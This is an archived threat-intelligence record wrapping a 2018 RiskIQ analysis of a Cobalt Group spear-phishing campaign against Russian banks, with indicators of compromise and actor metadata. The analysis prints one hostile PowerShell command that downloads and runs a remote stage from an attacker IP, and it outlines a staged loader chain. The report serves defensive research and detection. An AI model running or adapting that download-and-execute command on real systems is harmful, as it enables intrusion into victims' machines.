{
	"id": "4a276ce8-e14a-4904-b892-d45fe44fa882",
	"created_at": "2026-04-06T00:12:07.272774Z",
	"updated_at": "2026-04-10T13:11:25.806649Z",
	"deleted_at": null,
	"sha1_hash": "728a27b51df771e92487111fabaa97aab6386d82",
	"title": "First Activities of Cobalt Group in 2018: Spear-phishing Russian Banks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 899125,
	"plain_text": "First Activities of Cobalt Group in 2018: Spear-phishing Russian Banks\r\nBy Yonathan Klijnsma, January 16, 2018\r\nPublished: 2018-01-16 · Archived: 2026-04-05 19:01:17 UTC\r\nLast November, we documented activities of the Cobalt Group using CVE-2017-11882. In December they were already setting up for their next campaign. Today, on January 16th, the first wave of spear phishing emails was delivered to the inboxes of Russian banks. Sadly, this time around, the group didn’t forget to BCC.\r\nThe emails were sent in the name of a large European bank in an attempt to social engineer the receiver into trusting the email. The emails were quite plain with only a single question in the body and an attachment with the name once.rtf. In other cases, we saw a file with the name Заявление.rtf attached to an email that was also written in Russian:\r\nhttps://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/\r\nPage 1 of 4\n\nFig-1 Example of spear phishing email\r\nThe emails were sent from addresses on the domains bankosantantder.com and billing-cbr.ru, which were both set up for this campaign specifically.\r\nAnalysis\r\nThe attachment abuses CVE-2017-11882 to start PowerShell with the following command:\r\npowershell -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://46.21.147.61:80/a'))\"\r\nThis command downloads and executes a second stage, which is also a PowerShell script, but encoded:\r\nFig-2 Second stage\r\nThis script decodes to the third stage of the attack, another PowerShell script. This stage-three script is used to load a small piece of embedded shellcode into memory and run it like so:\r\nFig-3 Stage-three script\r\nThe shellcode starts the Cobalt Strike stager in a new thread. This stager will initiate connectivity with the C2 server to install the Cobalt Strike implant.\r\nInfrastructure\r\nAs shown, the stager beacons out to helpdesk-oracle.com, which was registered by a person using the email address krystianwalczak@yandex.com. This email address pointed us to another domain, which was registered on the same date and follows a similar pattern:\r\nFig-4 WHOIS information for the malicious email addresses\r\nRight now, the server to which the domain help-desc-me.com points doesn’t seem to be active, nor have we seen any malicious samples connect to it. We have marked it as malicious and listed it in the IOCs below, as we believe it will be part of either a next stage of the attack shown above or used in the next wave of spear phishing emails.\r\nIndicators of Compromise (IOC)\r\nAll of the IOCs listed below are also available in the RiskIQ Community Public Project located here:\r\nhttps://community.riskiq.com/projects/f0cd2fc9-a361-2a4c-4489-a21ddf98349b\r\nWe have not added the hashes of the staging scripts because they do not appear on the system itself—they live in memory during the initial stages of the attack.\r\nFilesystem IOCs\r\nFilename(s) | Note | MD5\r\nOnce.rtf, Заявление.rtf | CVE-2017-11882 RTF | 2e0cc6890fbf7a469d6c0ae70b5859e7\r\nNetwork IOCs\r\nDomain | IP Address | Note\r\nbankosantantder.com | 46.102.152.157 | Sender domain\r\nbilling-cbr.ru | 85.204.74.117 | Sender domain\r\nhelpdesk-oracle.com | 46.21.147.61 | C2 server\r\nhelp-desc-me.com | 139.60.163.10 | Secondary C2\r\nSource: https://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/"
	],
	"report_names": [
		"cobalt-group-spear-phishing-russian-banks"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2dfaa730-7079-494c-b2f0-3ff8f3598a51",
			"created_at": "2022-10-25T16:07:23.474746Z",
			"updated_at": "2026-04-10T02:00:04.623746Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"ATK 67",
				"Cobalt Gang",
				"Cobalt Spider",
				"G0080",
				"Gold Kingswood",
				"Mule Libra",
				"TAG-CR3"
			],
			"source_name": "ETDA:Cobalt Group",
			"tools": [
				"ATMRipper",
				"ATMSpitter",
				"Agentemis",
				"AmmyyRAT",
				"AtNow",
				"COOLPANTS",
				"CobInt",
				"Cobalt Strike",
				"CobaltStrike",
				"Cyst Downloader",
				"Fareit",
				"FlawedAmmyy",
				"Formbook",
				"Little Pig",
				"Metasploit Stager",
				"Mimikatz",
				"More_eggs",
				"NSIS",
				"Nullsoft Scriptable Install System",
				"Pony Loader",
				"Ripper ATM",
				"SDelete",
				"Siplog",
				"SoftPerfect Network Scanner",
				"SpicyOmelette",
				"Taurus Builder",
				"Taurus Builder Kit",
				"Taurus Loader",
				"Terra Loader",
				"ThreatKit",
				"VenomKit",
				"cobeacon",
				"win.xloader"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c11abba0-f5e8-4017-a4ee-acb1a7c8c242",
			"created_at": "2022-10-25T15:50:23.744036Z",
			"updated_at": "2026-04-10T02:00:05.294413Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"Cobalt Group",
				"GOLD KINGSWOOD",
				"Cobalt Gang",
				"Cobalt Spider"
			],
			"source_name": "MITRE:Cobalt Group",
			"tools": [
				"Mimikatz",
				"More_eggs",
				"SpicyOmelette",
				"SDelete",
				"Cobalt Strike",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434327,
	"ts_updated_at": 1775826685,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/728a27b51df771e92487111fabaa97aab6386d82.pdf",
		"text": "https://archive.orkl.eu/728a27b51df771e92487111fabaa97aab6386d82.txt",
		"img": "https://archive.orkl.eu/728a27b51df771e92487111fabaa97aab6386d82.jpg"
	}
}